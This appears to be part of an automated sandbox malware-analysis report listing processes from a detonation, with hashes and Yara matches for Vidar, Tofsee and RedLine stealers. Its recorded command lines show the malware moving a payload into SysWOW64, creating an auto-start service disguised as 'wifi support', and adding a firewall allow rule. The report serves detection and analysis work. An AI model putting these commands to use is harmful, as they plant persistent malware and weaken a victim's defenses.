                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:13
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 520
                                                                                                                                  Imagebase:0xef0000
                                                                                                                                  File size:434592 bytes
                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:17
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\454.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\454.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:312832 bytes
                                                                                                                                  MD5 hash:733045B137714FDD39BF6F9C6C063134
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.388741222.00000000005D8000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000018.00000002.388741222.00000000005D8000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML

                                                                                                                                  General

                                                                                                                                  Start time:23:38:22
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\12CC.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\12CC.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:298496 bytes
                                                                                                                                  MD5 hash:42F7FCDEACB40167D32D7CA782CE9169
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000019.00000002.420370458.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000019.00000002.423567221.0000000002090000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000019.00000003.400320288.00000000020B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML

                                                                                                                                  General

                                                                                                                                  Start time:23:38:26
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\2655.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2655.exe
                                                                                                                                  Imagebase:0xf80000
                                                                                                                                  File size:537088 bytes
                                                                                                                                  MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001A.00000002.447200055.0000000004331000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 67%, ReversingLabs

                                                                                                                                  General

                                                                                                                                  Start time:23:38:31
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hdysgoc\
                                                                                                                                  Imagebase:0x150000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:31
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:32
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qflfaqod.exe" C:\Windows\SysWOW64\hdysgoc\
                                                                                                                                  Imagebase:0x150000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:32
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:33
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\System32\sc.exe" create hdysgoc binPath= "C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d\"C:\Users\user\AppData\Local\Temp\12CC.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                  Imagebase:0x100000
                                                                                                                                  File size:60928 bytes
                                                                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:33
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:34
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\System32\sc.exe" description hdysgoc "wifi internet conection
                                                                                                                                  Imagebase:0x100000
                                                                                                                                  File size:60928 bytes
                                                                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:34
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:35
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\sc.exe" start hdysgoc
                                                                                                                                  Imagebase:0x100000
                                                                                                                                  File size:60928 bytes
                                                                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:36
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:36
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                  Imagebase:0x7ff77e540000
                                                                                                                                  File size:455656 bytes
                                                                                                                                  MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:36
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                  Imagebase:0x11f0000
                                                                                                                                  File size:82944 bytes
                                                                                                                                  MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:36
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                  General

                                                                                                                                  Start time:23:38:36
                                                                                                                                  Start date:11/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d"C:\Users\user\AppData\Local\Temp\12CC.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:11636736 bytes
                                                                                                                                  MD5 hash:D87304ADE23471353A7A95FEF9256AC6
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000029.00000002.430698166.0000000000D40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000029.00000002.430085518.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000029.00000002.430746891.0000000000DA0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000029.00000003.427461550.0000000000D60000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                  Disassembly

                                                                                                                                  Code Analysis

                                                                                                                                  Reset < >